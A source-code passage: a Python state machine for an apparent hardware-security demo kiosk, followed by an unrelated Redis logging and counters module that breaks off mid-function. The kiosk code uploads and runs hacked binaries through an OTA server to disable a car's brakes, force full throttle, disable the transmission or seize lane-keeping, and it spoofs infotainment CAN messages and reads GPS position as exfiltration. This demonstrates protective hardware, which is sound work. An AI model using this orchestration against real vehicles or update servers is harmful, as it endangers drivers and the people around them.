canlib.BUTTON_VOLUME_UP: "BUTTON_VOLUME_UP"
}
class HackerKiosk:
"""
Kiosk Director implements the desired state flow for the hacker kiosk experience
"""
ZMQ_PORT = 5091
ZMQ_POLL_TIMEOUT = 0.1
OTA_SERVER_IP = {
canlib.SCENARIO_BASELINE: "10.88.88.11",
canlib.SCENARIO_SECURE_INFOTAINMENT: "10.88.88.21",
canlib.SCENARIO_SECURE_ECU: "10.88.88.31",
}
INFO_SERVER_HACKED_PATH = "/home/pi/BESSPIN-Tool-Suite/BESSPIN-LFS/GFE/appsBinaries/infotainment-server/debian/hacked_server.elf"
ECU_HACKS_PATH = "/home/pi/BESSPIN-Tool-Suite/BESSPIN-LFS/GFE/appsBinaries/ecu-hacks/"
BRAKES_NOMINAL_HACK_PATH = ECU_HACKS_PATH +"brakeNominal"
BRAKES_HACKED_HACK_PATH = ECU_HACKS_PATH +"brakeHacked"
THROTTLE_NOMINAL_HACK_PATH = ECU_HACKS_PATH +"throttleNominal"
THROTTLE_HACKED_HACK_PATH = ECU_HACKS_PATH +"throttleHacked"
LKAS_NOMINAL_HACK_PATH = ECU_HACKS_PATH +"lkasNominal"
LKAS_HACKED_HACK_PATH = ECU_HACKS_PATH +"lkasHacked"
TRANSMISSION_NOMINAL_HACK_PATH = ECU_HACKS_PATH +"gearNominal"
TRANSMISSION_HACKED_HACK_PATH = ECU_HACKS_PATH +"gearHacked"
# full name of the states
state_names = [
"reset", # reset SSITH ECU scenario components here
"hack02_kiosk_intro",
"hack05_info_attempt",
"hack06_info_exploit",
"hack06_info_exploit_attemp_hack",
"hack08_critical_exploit",
"hack09_protect",# reset Baseline scenario components here
"hack10_protect_info_attempt",
"hack10_info_exploit_attempt_hack",
"hack12_protect_critical",
"hack12_critical_exploit"
]
# this is a brief description of the state transitions that is expanded at runtime
# into pytransitions transitions
transition_names = [
{'transition': ('reset', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('reset', 'hack02_kiosk_intro'), 'conditions': 'button_pressed_next'},
{'transition': ('hack02_kiosk_intro', 'hack05_info_attempt'), 'conditions': 'button_pressed_next'},
{'transition': ('hack05_info_attempt', 'hack06_info_exploit'), 'conditions': 'button_pressed_next'},
{'transition': ('hack06_info_exploit', 'hack06_info_exploit_attemp_hack'), 'conditions': 'button_pressed_info_exploit'},
{'transition': ('hack06_info_exploit_attemp_hack', 'hack06_info_exploit'), 'conditions': 'exploit_complete'},
{'transition': ('hack06_info_exploit', 'hack08_critical_exploit'), 'conditions': 'button_pressed_critical_exploit'},
{'transition': ('hack08_critical_exploit', 'hack06_info_exploit'), 'conditions': 'exploit_complete'},
{'transition': ('hack06_info_exploit', 'hack09_protect'), 'conditions': 'button_pressed_next'},
{'transition': ('hack09_protect', 'hack10_protect_info_attempt'), 'conditions': 'button_pressed_ssith_infotainment'},
{'transition': ('hack10_protect_info_attempt', 'hack10_info_exploit_attempt_hack'), 'conditions': 'button_pressed_info_exploit'},
{'transition': ('hack10_info_exploit_attempt_hack', 'hack10_protect_info_attempt'), 'conditions': 'exploit_complete'},
{'transition': ('hack09_protect', 'hack12_protect_critical'), 'conditions': 'button_pressed_ssith_ecu'},
{'transition': ('hack12_protect_critical', 'hack12_critical_exploit'), 'conditions': 'button_pressed_critical_exploit'},
{'transition': ('hack12_critical_exploit', 'hack12_protect_critical'), 'conditions': 'exploit_complete'},
{'transition': ('hack02_kiosk_intro', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack05_info_attempt', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack06_info_exploit', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack09_protect', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack10_protect_info_attempt', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack12_protect_critical', 'reset'), 'conditions': 'button_pressed_reset'},
]
def __init__(self, net_conf, deploy_mode=True):
"""kiosk state machine"""
assert(net_conf)
self.deploy_mode = deploy_mode
self.states = None
self.transitions = None
self.inputs = None
self.machine = self.prepare_state_machine()
self.state_arg = None
self.is_reset_completed = False
self.stop_evt = threading.Event()
# ZMQ init
self.zmq_port = net_conf.port_network_ipcPort
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REP)
self.socket.bind(f"tcp://*:{self.zmq_port}")
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
# State machine data
self.active_scenario = canlib.SCENARIO_BASELINE
self.ota_server_port = net_conf.port_network_otaServerPort
self.brakes_ok = True
self.lkas_disabled = True
self.transmission_ok = True
self.throttle_ok = True
self.hack12_has_been_initialized = False
self.x = 0.0
self.y = 0.0
self.z = 0.0
self.ota_server = None
# IPC message
self.ipc_msg = {}
# CMD BUS
cmd_host, cmd_subscribers = net_conf.getCmdNetworkNodes("HackerKiosk")
self.cmd_bus = canlib.TcpBus(cmd_host, cmd_subscribers)
# CAN UDP BUS (For hacked infotainment server)
print(f"<{self.__class__.__name__}> UDP bus listening at {net_conf.nodes['HackerKiosk']}:{net_conf.port_network_hackedInfotainmentPort}")
self.infotainment_bus = canlib.UdpBus(port=net_conf.port_network_hackedInfotainmentPort,ip="")
self.cmd_thread = threading.Thread(target=self.cmdLoop, args=[], daemon=True)
self.info_thread = threading.Thread(target=self.infoLoop, args=[], daemon=True)
print(f"<{self.__class__.__name__}> Listening on ZMQ_PORT {self.zmq_port}")
self.default_inputs()
def run(self):
self.cmd_thread.start()
self.info_thread.start()
while not self.stopped:
msgs = dict(self.poller.poll(HackerKiosk.ZMQ_POLL_TIMEOUT))
if self.socket in msgs and msgs[self.socket] == zmq.POLLIN:
req = self.socket.recv_json()
print(f"<{self.__class__.__name__}> Got request: {req}")
self.ipc_msg['args'] = req['args']
self.ipc_msg['func'] = req['func']
self.submit_button(self.ipc_msg['func'],self.ipc_msg['args'])
self.socket.send_json(self.ipc_msg)
else:
self.next_state([])
def stop(self):
self.stop_evt.set()
@property
def stopped(self):
return self.stop_evt.is_set()
def exit(self):
self.stop()
def infoLoop(self):
"""Purpose of this function is to listen
to position updates from the hacked infotainment server
"""
print(f"<{self.__class__.__name__}> Info loop started")
while True:
msg = self.infotainment_bus.recv()
if msg:
cid, data = msg.arbitration_id, msg.data
try:
# NOTE: we need to listen to the CAN_ID_CAR_X/Y/Z/R from the hacked server
# Make sure we are listening for the right IP address
if cid == canlib.CAN_ID_CAR_X:
# Get X coordinate
self.x = struct.unpack(canlib.CAN_FORMAT_CAR_X, data)[0]
elif cid == canlib.CAN_ID_CAR_Y:
# Get Y coordinate
self.y = struct.unpack(canlib.CAN_FORMAT_CAR_Y, data)[0]
elif cid == canlib.CAN_ID_CAR_Z:
# Get Z coordinate
self.z = struct.unpack(canlib.CAN_FORMAT_CAR_Z, data)[0]
except Exception as exc:
print(f"<{self.__class__.__name__}> Error processing message: {msg}: {exc}")
def cmdLoop(self):
print(f"<{self.__class__.__name__}> Cmd loop started")
while True:
msg = self.cmd_bus.recv()
if msg:
cid, data = msg.arbitration_id, msg.data
try:
# NOTE: Do something else here?
print(f"<{self.__class__.__name__}> CMD_BUS CAN_ID={hex(cid)}, data={data}")
except Exception as exc:
print(f"<{self.__class__.__name__}> Error processing message: {msg}: {exc}")
@property
def is_finished(self):
"""state machine termination condition"""
return False
def default_inputs(self):
"""set all button inputs to false"""
for inp in self.inputs:
setattr(self, f'{inp}', False)
def resetEcuState(self):
self.brakes_ok = True
self.lkas_disabled = True
self.transmission_ok = True
self.throttle_ok = True
self.x = 0.0
self.y = 0.0
self.z = 0.0
def submit_button(self, button_name, arg):
"""activate a button input and send the kiosk to the next state"""
self.default_inputs()
if hasattr(self, f'button_pressed_{button_name}'):
setattr(self, f'button_pressed_{button_name}', True)
else:
print(f"Error: unknown button: {button_name}")
pass
self.next_state(arg)
def set_arg(self, arg=None):
"""setter for arguments shared between button call and state"""
self.state_arg = arg
def prepare_state_machine(self):
"""expand state machine description and create pytransitions machine"""
# create state objects from state name
self.states = [State(name=s, on_enter=f'{s}_enter') for s in self.state_names]
# create transition objects from static transition description
self.transitions = []
self.inputs = set()
for tn in self.transition_names:
base_dict = {'trigger': 'next_state',
'source': tn['transition'][0],
'dest': tn['transition'][1],
'before': 'set_arg'}
if 'conditions' in tn:
base_dict['conditions'] = tn['conditions']
self.inputs |= {tn['conditions']}
if 'unless' in tn:
base_dict['unless'] = tn['unless']
self.inputs |= {tn['unless']}
self.transitions.append(base_dict)
return Machine(self, states=self.states, transitions=self.transitions, initial='reset', show_conditions=True)
def draw_graph(self, fname: str):
"""draw a fsm graphviz graph (for documentation, troubleshooting)
NOTE: you will need to install graphviz (with dot)
"""
self.machine.get_graph().draw(fname, prog='dot')
def hack_ota_and_upload_hacked_infotainment_server(self) -> bool:
"""
1) Hack OTA server
2) if 1) successful, upload and execute hacked info server binary
"""
print("Attempting to hack OTA server.")
if self.deploy_mode:
print("Uploading the hacked infotainment server")
hack_ok, data = self.ota_server.upload_and_execute_file(HackerKiosk.INFO_SERVER_HACKED_PATH)
if hack_ok:
print("Hack successful!")
else:
print(f"Hack failed with: {data}")
else:
print("Hack successful!")
print("Uploading hacked infotainment server")
print("Upload successful!")
hack_ok = True
return hack_ok
@page
def reset_enter(self, arg):
"""
Switch to BASELINE_SCENARIO
* no active hack
* scenario is Baseline
* reset Target1, InfoServer1, InfoServer3
"""
self.button_pressed_next = False
self.button_pressed_reset = False
self.hackActive(canlib.HACK_NONE)
self.switchActiveScenario(canlib.SCENARIO_BASELINE)
# Reset SSITH ECU scenario components
self.restartComponent(canlib.INFOTAINMENT_SERVER_3)
self.restartComponent(canlib.OTA_UPDATE_SERVER_3)
# FIXME: reset CHERI just in case
#self.restartComponent(canlib.TARGET_3)
# TODO: No need to reset Info server 2?
# Infotainment server 3 is in the secure ECU scenario
# TODO: Wait till the reset is complete?
# Reset state
self.hack12_has_been_initialized = False
# Respond
self.ipc_msg['status'] = 200 # OK
@page
def hack02_kiosk_intro_enter(self, arg):
"""
Reset is complete
No action needed
"""
self.button_pressed_next = False
# Respond
self.ipc_msg['status'] = 200 # OK
@page
def hack05_info_attempt_enter(self, arg):
"""
Hack OTA server
* hack the server
* upload hacked infotainment
"""
self.button_pressed_next = False
hack_ok = self.hack_ota_and_upload_hacked_infotainment_server()
self.ipc_msg['retval'] = hack_ok
self.ipc_msg['status'] = 200 # OK
@page
def hack06_info_exploit_enter(self, arg):
"""
Wait for the exploit selection
"""
self.button_pressed_next = False
self.exploit_complete = False
self.ipc_msg['status'] = 200 # OK
@page
def hack06_info_exploit_attemp_hack_enter(self, arg):
"""
Attempt a selected infotainment exploit
* check args for which hack to use
"""
self.button_pressed_info_exploit = False
self.exploit_complete = True
# `ipc_msg` is updated accordingly
self.execute_infotainment_hack(arg)
self.ipc_msg['status'] = 200 # OK
@page
def hack08_critical_exploit_enter(self, arg):
"""
Attempt a selected critical exploit
* check args for which hack to use
"""
self.button_pressed_critical_exploit = False
self.exploit_complete = True
# `ipc_msg` is updated accordingly
self.execute_ecu_hack(arg)
self.ipc_msg['status'] = 200 # OK
@page
def hack09_protect_enter(self, arg):
"""
Switch to SSITH_INFOTAINMENT_SCENARIO
NOTE: Reset baseline target(s) here to save time?
"""
self.button_pressed_next = False
self.hackActive(canlib.HACK_NONE)
self.switchActiveScenario(canlib.SCENARIO_SECURE_INFOTAINMENT)
# Reset components for the baseline scenario
self.restartComponent(canlib.INFOTAINMENT_SERVER_1)
self.restartComponent(canlib.OTA_UPDATE_SERVER_1)
self.restartComponent(canlib.TARGET_1)
self.ipc_msg['status'] = 200 # OK
@page
def hack10_protect_info_attempt_enter(self, arg):
"""
Attempt OTA hack
"""
self.button_pressed_ssith_infotainment = False
hack_ok = self.hack_ota_and_upload_hacked_infotainment_server()
self.ipc_msg['retval'] = hack_ok
self.ipc_msg['status'] = 200 # OK
@page
def hack10_info_exploit_attempt_hack_enter(self, arg):
"""
Attempt a selected infotainment exploit
"""
self.button_pressed_info_exploit = False
self.exploit_complete = True
self.execute_infotainment_hack(arg)
# NOTE: we assume that the hack failed.
# To properly check ifthe hack was succesfull or not,
# we would have to listen to the hacked infotainment
# UDP traffic, and see if a state has changed *after*
# a button is pressed.
self.ipc_msg['retval'] = "Hack Failed"
self.ipc_msg['status'] = 200 # OK
@page
def hack12_protect_critical_enter(self, arg):
"""
If active scenario is NOT the SSITH_ECU,
switch to SSITH_ECU scenario
"""
self.button_pressed_ssith_ecu = False
if not self.hack12_has_been_initialized:
self.switchActiveScenario(canlib.SCENARIO_SECURE_ECU)
self.hack12_has_been_initialized = True
self.ipc_msg['status'] = 200 # OK
@page
def hack12_critical_exploit_enter(self, arg):
"""
Attempt a selected ecu exploit
"""
self.button_pressed_critical_exploit = False
self.exploit_complete = True
# `ipc_msg` is updated accordingly
self.execute_ecu_hack(arg)
self.ipc_msg['status'] = 200 # OK
def switchActiveScenario(self, scenario_id) -> bool:
"""
Switching active scenario
* update active scenario ID
* notify peers
* new OTA client instance (adjusted URL)
"""
# Update state
self.active_scenario = scenario_id
# Reset internal states
self.resetEcuState()
# Set OTA client
url = f"http://{HackerKiosk.OTA_SERVER_IP[self.active_scenario]}:{self.ota_server_port}"
print(f"Setting up OTA client with URL: {url}")
print(f"CMD_CHANGE_ACTIVE_SCENARIO: {ComponentDictionary[scenario_id]}")
self.ota_server = kclient.HackOtaClient(url)
try:
msg = Message(arbitration_id=canlib.CAN_ID_CMD_ACTIVE_SCENARIO,
data=struct.pack(canlib.CAN_FORMAT_CMD_ACTIVE_SCENARIO, scenario_id))
self.cmd_bus.send(msg)
return True
except Exception as exc:
print(f"<{self.__class__.__name__}> Error sending message: {msg}: {exc}")
return False
def restartComponent(self, component_id) -> bool:
"""
Notify peers about the restart (AdminPC is doing the restart)
TODO: wait for some sort of response?
"""
print(f"CAN_ID_CMD_RESTART: {ComponentDictionary[component_id]}")
try:
msg = Message(arbitration_id=canlib.CAN_ID_CMD_RESTART,
data=struct.pack(canlib.CAN_FORMAT_CMD_RESTART, component_id))
self.cmd_bus.send(msg)
return True
except Exception as exc:
print(f"<{self.__class__.__name__}> Error sending message: {msg}: {exc}")
return False
def hackActive(self, hack_id) -> bool:
"""
Notify peers about the active hack (only in BASELINE scenario)
(Ignition LED manager changes LED pattern)
"""
print(f"CAN_ID_CMD_HACK_ACTIVE: {ComponentDictionary[hack_id]}")
try:
msg = Message(arbitration_id=canlib.CAN_ID_CMD_HACK_ACTIVE,
data=struct.pack(canlib.CAN_FORMAT_CMD_HACK_ACTIVE, hack_id))
self.cmd_bus.send(msg)
return True
except Exception as exc:
print(f"<{self.__class__.__name__}> Error sending message: {msg}: {exc}")
return False
def buttonPressed(self, button_id) -> bool:
"""
Mimic an infotainment client and send button press to
the hacked info server, over UDP CAN network with a special port
"""
print(f"CAN_ID_BUTTON_PRESSED: {ButtonDictionary[button_id]}")
try:
msg = Message(arbitration_id=canlib.CAN_ID_BUTTON_PRESSED,
data=struct.pack(canlib.CAN_FORMAT_BUTTON_PRESSED, button_id))
self.infotainment_bus.send(msg)
return True
except Exception as exc:
print(f"<{self.__class__.__name__}> Error sending message: {msg}: {exc}")
return False
def execute_infotainment_hack(self, arg):
"""
Parse `arg`, and either:
* send `buttonPressed` message (volume/music)
* or listen to the incoming position messages (GPS exfil)
* updates `retval` accordingly
NOTE: there is (currently) no confirmation that the server received
the message
"""
if arg == "volumeUp":
self.buttonPressed(canlib.BUTTON_VOLUME_UP)
self.ipc_msg['retval'] = "Volume increased"
elif arg == "volumeDown":
self.buttonPressed(canlib.BUTTON_VOLUME_DOWN)
self.ipc_msg['retval'] = "Volume decreased"
elif arg == "exfil":
self.ipc_msg['retval'] = f"{self.x}, {self.y}, {self.z}"
elif arg == "changeStation_1":
self.buttonPressed(canlib.BUTTON_STATION_1)
self.ipc_msg['retval'] = "Station set to 1"
self.ipc_msg['args'] = 'changeStation'
elif arg == "changeStation_2":
self.buttonPressed(canlib.BUTTON_STATION_2)
self.ipc_msg['retval'] = "Station set to 2"
self.ipc_msg['args'] = 'changeStation'
elif arg == "changeStation_3":
self.buttonPressed(canlib.BUTTON_STATION_3)
self.ipc_msg['retval'] = "Station set to 3"
self.ipc_msg['args'] = 'changeStation'
else:
print(f"Unkwon arg: {arg}")
self.ipc_msg['retval'] = "Error"
def execute_ecu_hack(self, arg):
"""
Parse `arg` and upload & execute hacked/nominal
binary to the target OTA server
* Binary is target dependent (has a specific IP)
NOTE: simplify / make it a pattern?
"""
if self.active_scenario == canlib.SCENARIO_BASELINE:
if self.deploy_mode:
suffix = "_baseline.elf"
else:
suffix = "_baseline-arm.elf"
elif self.active_scenario == canlib.SCENARIO_SECURE_INFOTAINMENT:
if self.deploy_mode:
suffix = "_ssithInfo.elf"
else:
suffix = "_ssithInfo-arm.elf"
elif self.active_scenario == canlib.SCENARIO_SECURE_ECU:
if self.deploy_mode:
suffix = "_ssithEcu.elf"
else:
suffix = "_ssithEcu-arm.elf"
else:
# This shouldn't happen
print(f"Unknown scenario! {self.active_scenario}")
return
if arg == "brakes":
if self.brakes_ok:
# Brakes are OK, we want them OFF(hacked)
filename = HackerKiosk.BRAKES_HACKED_HACK_PATH + suffix
else:
# brakes are OFF, we want them back ON
filename = HackerKiosk.BRAKES_NOMINAL_HACK_PATH + suffix
if self.deploy_mode:
hack_ok, res = self.ota_server.upload_and_execute_file(filename)
print(res)
else:
# Execute critical hack from the host
cmd = f"{filename}"
subprocess.call(cmd,shell=True)
hack_ok = True
# Update status only if hack_ok
if hack_ok:
self.brakes_ok = not self.brakes_ok
# Always provide returnval
self.ipc_msg['retval'] = self.brakes_ok
if not self.brakes_ok:
self.hackActive(canlib.HACK_BRAKE)
else:
if self.brakes_ok and self.throttle_ok and self.transmission_ok and self.lkas_disabled:
self.hackActive(canlib.HACK_NONE)
elif arg == "throttle":
if self.throttle_ok:
# Throttle is OK, we want to hack it (full throttle)
filename = HackerKiosk.THROTTLE_HACKED_HACK_PATH + suffix
else:
# Throttle is hacked, restore nominal operation
filename = HackerKiosk.THROTTLE_NOMINAL_HACK_PATH + suffix
if self.deploy_mode:
hack_ok, res = self.ota_server.upload_and_execute_file(filename)
print(res)
else:
# Execute critical hack from the host
cmd = f"{filename}"
subprocess.call(cmd,shell=True)
hack_ok = True
# Update status only if hack_ok
if hack_ok:
self.throttle_ok = not self.throttle_ok
# Always provide returnval
self.ipc_msg['retval'] = self.throttle_ok
if not self.throttle_ok:
self.hackActive(canlib.HACK_THROTTLE)
else:
if self.brakes_ok and self.throttle_ok and self.transmission_ok and self.lkas_disabled:
self.hackActive(canlib.HACK_NONE)
elif arg == "lkas":
if self.lkas_disabled:
# LKAS is disabled, we want to enable it (hack it)
filename = HackerKiosk.LKAS_HACKED_HACK_PATH + suffix
else:
# LKAS is enabled, we want to disable it (nominal)
filename = HackerKiosk.LKAS_NOMINAL_HACK_PATH + suffix
if self.deploy_mode:
hack_ok, res = self.ota_server.upload_and_execute_file(filename)
print(res)
else:
# Execute critical hack from the host
cmd = f"{filename}"
subprocess.call(cmd,shell=True)
hack_ok = True
# Update status only if hack_ok
if hack_ok:
self.lkas_disabled = not self.lkas_disabled
# Always provide returnval
self.ipc_msg['retval'] = self.lkas_disabled
if not self.lkas_disabled:
self.hackActive(canlib.HACK_LKAS)
else:
if self.brakes_ok and self.throttle_ok and self.transmission_ok and self.lkas_disabled:
self.hackActive(canlib.HACK_NONE)
elif arg == "transmission":
if self.transmission_ok:
# Transmission is OK, we want to disable it (hack it)
filename = HackerKiosk.TRANSMISSION_HACKED_HACK_PATH + suffix
else:
# Transmission is disabled/hacked, we want to enable it
# (back to nominal)
filename = HackerKiosk.TRANSMISSION_NOMINAL_HACK_PATH + suffix
if self.deploy_mode:
hack_ok, res = self.ota_server.upload_and_execute_file(filename)
print(res)
else:
# Execute critical hack from the host
cmd = f"{filename}"
subprocess.call(cmd,shell=True)
hack_ok = True
# Update status only if hack_ok
if hack_ok:
self.transmission_ok = not self.transmission_ok
# Always provide returnval
self.ipc_msg['retval'] = self.transmission_ok
if not self.transmission_ok:
self.hackActive(canlib.HACK_TRANSMISSION)
else:
if self.brakes_ok and self.throttle_ok and self.transmission_ok and self.lkas_disabled:
self.hackActive(canlib.HACK_NONE)
else:
print(f"Unknown arg: {arg}")
self.ipc_msg['retval'] = False
|
app_support_funcs.py
|
import bisect
import contextlib
import csv
from datetime import datetime
import functools
import json
import logging
import random
import threading
import time
import unittest
import uuid
import redis
def to_bytes(x):
return x.encode() if isinstance(x, str) else x
def to_str(x):
return x.decode() if isinstance(x, bytes) else x
QUIT = False
SAMPLE_COUNT = 100
config_connection = None
# <start id="recent_log"/>
SEVERITY = { # A
logging.DEBUG: 'debug', # A
logging.INFO: 'info', # A
logging.WARNING: 'warning', # A
logging.ERROR: 'error', # A
logging.CRITICAL: 'critical', # A
} # A
SEVERITY.update((name, name) for name in list(SEVERITY.values())) # A
def log_recent(conn, name, message, severity=logging.INFO, pipe=None):
severity = str(SEVERITY.get(severity, severity)).lower() # B
destination = 'recent:%s:%s' % (name, severity) # C
message = time.asctime() + ' ' + message # D
pipe = pipe or conn.pipeline() # E
pipe.lpush(destination, message) # F
pipe.ltrim(destination, 0, 99) # G
pipe.execute() # H
# <end id="recent_log"/>
# A Set up a mapping that should help turn most logging severity levels into something consistent
# B Actually try to turn a logging level into a simple string
# C Create the key that messages will be written to
# D Add the current time so that we know when the message was sent
# E Set up a pipeline so we only need 1 round trip
# F Add the message to the beginning of the log list
# G Trim the log list to only include the most recent 100 messages
# H Execute the two commands
# END
# <start id="common_log"/>
def log_common(conn, name, message, severity=logging.INFO, timeout=5):
severity = str(SEVERITY.get(severity, severity)).lower() # A
destination = 'common:%s:%s' % (name, severity) # B
start_key = destination + ':start' # C
pipe = conn.pipeline()
end = time.time() + timeout
while time.time() < end:
try:
pipe.watch(start_key) # D
now = datetime.utcnow().timetuple() # E
hour_start = datetime(*now[:4]).isoformat() # F
existing = pipe.get(start_key)
pipe.multi() # H
if existing and existing < to_bytes(hour_start): # G
pipe.rename(destination, destination + ':last') # I
pipe.rename(start_key, destination + ':pstart') # I
pipe.set(start_key, hour_start) # J
elif not existing: # J
pipe.set(start_key, hour_start) # J
pipe.zincrby(destination, 1, message) # K
log_recent(pipe, name, message, severity, pipe) # L
return
except redis.exceptions.WatchError:
continue # M
# <end id="common_log"/>
# A Handle the logging level
# B Set up the destination key for keeping recent logs
# C Keep a record of the start of the hour for this set of messages
# D We are going to watch the start of the hour key for changes that only happen at the beginning of the hour
# E Get the current time
# F Find the current start hour
# G If the current list of common logs is for a previous hour
# H Set up the transaction
# I Move the old common log information to the archive
# J Update the start of the current hour for the common logs
# K Actually increment our common counter
# L Call the log_recent() function to record these there, and rely on its call to execute()
# M If we got a watch error from someone else archiving, try again
# END
# <start id="update_counter"/>
PRECISION = [1, 5, 60, 300, 3600, 18000, 86400] # A
def update_counter(conn, name, count=1, now=None):
now = now or time.time() # B
pipe = conn.pipeline() # C
for prec in PRECISION: # D
pnow = int(now / prec) * prec # E
hash = '%s:%s' % (prec, name) # F
pipe.zadd('known:', {hash: 0}) # G
pipe.hincrby('count:' + hash, pnow, count) # H
pipe.execute()
# <end id="update_counter"/>
# A The precision of the counters in seconds: 1 second, 5 seconds, 1 minute, 5 minutes, 1 hour, 5 hours, 1 day - adjust as necessary
# B Get the current time to know when is the proper time to add to
# C Create a transactional pipeline so that later cleanup can work correctly
# D Add entries for all precisions that we record
# E Get the start of the current time slice
# F Create the named hash where this data will be stored
# G Record a reference to the counters into a ZSET with the score 0 so we can clean up after ourselves
# H Update the counter for the given name and time precision
# END
# <start id="get_counter"/>
def get_counter(conn, name, precision):
hash = '%s:%s' % (precision, name) # A
data = conn.hgetall('count:' + hash) # B
to_return = [] # C
for key, value in data.items(): # C
to_return.append((int(key), int(value))) # C
to_return.sort() # D
return to_return
# <end id="get_counter"/>
# A Get the name of the key where we will be storing counter data
# B Fetch the counter data from Redis
# C Convert the counter data into something more expected
# D Sort our data so that older samples are first
# END
# <start id="clean_counters"/>
def clean_counters(conn):
pipe = conn.pipeline(True)
passes = 0 # A
while not QUIT: # C
start = time.time() # D
index = 0 # E
while index < conn.zcard('known:'): # E
hash = conn.zrange('known:', index, index) # F
index += 1
if not hash:
break
hash = hash[0]
prec = int(hash.partition(b':')[0]) # G
bprec = int(prec // 60) or 1 # H
if passes % bprec: # I
continue
hkey = 'count:' + to_str(hash)
cutoff = time.time() - SAMPLE_COUNT * prec # J
samples = list(map(int, conn.hkeys(hkey))) # K
samples.sort() # L
remove = bisect.bisect_right(samples, cutoff) # L
if remove: # M
conn.hdel(hkey, *samples[:remove]) # M
if remove == len(samples): # N
try:
pipe.watch(hkey) # O
if not pipe.hlen(hkey): # P
pipe.multi() # P
pipe.zrem('known:', hash) # P
pipe.execute() # P
index -= 1 # B
else:
pipe.unwatch() # Q
except redis.exceptions.WatchError: # R
pass # R
passes += 1 # S
duration = min(int(time.time() - start) + 1, 60) # S
time.sleep(max(60 - duration, 1)) # T
# <end id="clean_counters"/>
# A Keep a record of the number of passes so that we can balance cleaning out per-second vs. per-day counters
# C Keep cleaning out counters until we are told to stop
# D Get the start time of the pass to calculate the total duration
# E Incrementally iterate over all known counters
# F Get the next counter to check
# G Get the precision of the counter
# H We are going to be taking a pass every 60 seconds or so, so we are going to try to clean out counters at roughly the rate that they are written to
# I Try the next counter if we aren't supposed to check this one on this pass (for example, we have taken 3 passes, but the counter has a precision of 5 minutes)
# J Find the cutoff time for the earliest sample that we should keep, given the precision and number of samples that we want to keep
# K Fetch the times of the samples, and convert the strings to integers
# L Determine the number of samples that should be deleted
# M Remove the samples as necessary
# N We have a reason to potentially remove the counter from the list of known counters ZSET
# O Watch the counter hash for changes
# P Verify that the counter hash is empty, and if so, remove it from the known counters
# B If we deleted a counter, then we can use the same index next pass
# Q The hash is not empty, keep it in the list of known counters
# R Someone else changed the counter hash by adding counters, which means that it has data, so we will leave the counter in the list of known counters
# S Update our passes and duration variables for the next pass, as an attempt to clean out counters as often as they are seeing updates
# T Sleep the remainder of the 60 seconds, or at least 1 second, just to offer a bit of a rest
# END
# <start id="update_stats"/>
def update_stats(conn, context, type, value, timeout=5):
""" Access time on every page """
destination = 'stats:%s:%s' % (context, type) # A
start_key = destination + ':start' # B
pipe = conn.pipeline(True)
end = time.time() + timeout
while time.time() < end:
try:
pipe.watch(start_key) # B
now = datetime.utcnow().timetuple() # B
hour_start = datetime(*now[:4]).isoformat() # B
existing = pipe.get(start_key)
pipe.multi()
if not existing:
pipe.set(start_key, hour_start)
elif existing < hour_start:
pipe.rename(destination, destination + ':last') # B
pipe.rename(start_key, destination + ':pstart') # B
pipe.set(start_key, hour_start) # B
tkey1 = str(uuid.uuid4())
tkey2 = str(uuid.uuid4())
pipe.zadd(tkey1, {'min': value}) # C
pipe.zadd(tkey2, {'max': value}) # C
pipe.zunionstore(destination, # D
[destination, tkey1], aggregate='min') # D
pipe.zunionstore(destination, # D
[destination, tkey2], aggregate='max') # D
pipe.delete(tkey1, tkey2) # E
pipe.zincrby(destination, 1, 'count') # F
pipe.zincrby(destination, value, 'sum') # F
pipe.zincrby(destination, value * value, 'sumsq') # F
return pipe.execute()[-3:] # G
except redis.exceptions.WatchError:
continue # H
# <end id="update_stats"/>
# A Set up the destination statistics key
# B Handle the current hour/last hour like in common_log()
# C Add the value to the temporary keys
# D Union the temporary keys with the destination stats key with the appropriate min/max aggregate
# E Clean up the temporary keys
# F Update the count, sum, and sum of squares members of the zset
# G Return the base counter info so that the caller can do something interesting if necessary
# H If the hour just turned over and the stats have already been shuffled over, try again
# END
# <start id="get_stats"/>
def get_stats(conn, context, type):
key = 'stats:%s:%s' % (context, type) # A
data = dict(conn.zrange(key, 0, -1, withscores=True)) # B
data[b'average'] = data[b'sum'] / data[b'count'] # C
numerator = data[b'sumsq'] - data[b'sum'] ** 2 / data[b'count'] # D
data[b'stddev'] = (numerator / (data[b'count'] - 1 or 1)) ** .5 # E
return data
# <end id="get_stats"/>
# A Set up the key that we are fetching our statistics from
# B Fetch our basic statistics and package them as a dictionary
# C Calculate the average
# D Prepare the first part of the calculation of standard deviation
# E Finish our calculation of standard deviation
# END
# <start id="access_time_context_manager"/>
@contextlib.contextmanager # A
def access_time(conn, context):
start = time.time() # B
yield # C
delta = time.time() - start # D
stats = update_stats(conn, context, 'AccessTime', delta) # E
average = stats[1] / stats[0] # F
pipe = conn.pipeline(True)
pipe.zadd('slowest:AccessTime', {context: average}) # G
pipe.zremrangebyrank('slowest:AccessTime', 0, -101) # H
pipe.execute()
# <end id="access_time_context_manager"/>
# A Make this Python generator into a context manager
# B Record the start time
# C Let the block of code that we are wrapping run
# D Calculate the time that the block took to execute
# E Update the stats for this context
# F Calculate the average
# G Add the average to a ZSET that holds the slowest access times
# H Keep the slowest 100 items in the AccessTime ZSET
# END
# <start id="access_time_use"/>
def process_view(conn, callback): # A
with access_time(conn, request.path): # B
return callback() # C
# <end id="access_time_use"/>
# A This example web view takes the Redis connection as well as a callback to generate the content
# B This is how you would use the access time context manager to wrap a block of code
# C This is executed when the 'yield' statement is hit from within the context manager
# END
# <start id="_1314_14473_9188"/>
def ip_to_score(ip_address):
score = 0
for v in ip_address.split('.'):
score = score * 256 + int(v, 10)
return score
# <end id="_1314_14473_9188"/>
# END
# <start id="_1314_14473_9191"/>
def import_ips_to_redis(conn, filename): # A
csv_file = csv.reader(open(filename, 'rb'))
for count, row in enumerate(csv_file):
start_ip = row[0] if row else '' # B
if 'i' in start_ip.lower():
continue
if '.' in start_ip: # B
start_ip = ip_to_score(start_ip) # B
elif start_ip.isdigit(): # B
start_ip = int(start_ip, 10) # B
else:
continue # C
